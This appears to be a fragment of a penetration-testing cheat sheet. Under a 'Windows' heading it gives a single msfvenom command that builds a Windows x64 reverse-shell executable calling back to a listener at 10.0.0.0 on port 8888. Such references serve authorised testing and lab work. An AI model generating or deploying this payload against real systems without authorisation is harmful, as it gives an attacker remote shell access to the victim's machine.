Windows

msfvenom -p windows/x64/shell_reverse_tcp lhost=10.0.0.0 lport 8888 -f exe reverse.exe

Last updated